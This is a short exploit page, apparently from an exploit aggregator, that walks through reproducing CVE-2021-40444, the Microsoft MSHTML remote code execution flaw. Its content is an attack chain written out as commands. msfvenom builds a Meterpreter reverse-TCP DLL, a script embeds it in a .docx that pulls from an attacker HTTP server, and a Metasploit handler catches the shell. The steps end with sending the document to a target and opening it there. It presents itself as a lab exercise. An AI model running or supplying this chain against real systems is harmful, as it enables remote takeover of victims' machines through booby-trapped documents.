## https://sploitus.com/exploit?id=8B907536-B213-590D-81B9-32CF4A55322E
# CVE-2021-40444-POC
An attempt to reproduce the Microsoft MSHTML Remote Code Execution (RCE) vulnerability using the Metasploit Framework.

*works best if not run in FlareVM*

### PREPARATION
Clone the repository with Git from https://github.com/lockedbyte/CVE-2021-40444

Generate the `.dll` template with `msfvenom`; it is used by the exploit script later:

`msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll`

Copy the newly generated `template.dll` into the `test/` folder of the repository.

Make `template.dll` executable with `chmod +x template.dll`.

Run the script so that `template.dll` is processed into the output document:

`python3 exploit.py generate ~/test/template.dll http://<SOURCE_IP>`

### LISTENER
The document is then exported into the `out/` folder, and we can start a listener on our HTTP port (default is 80):

`python3 exploit.py host 80`

Run Metasploit with:

```
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <SOURCE_IP>
run
```

### PAYLOAD
Then we can send `document.docx` to the vulnerable machine and open the `.docx` there.

We will see a response in the `exploit.py` terminal, and the lab is successful if a reverse TCP shell is spawned in the Metasploit handler.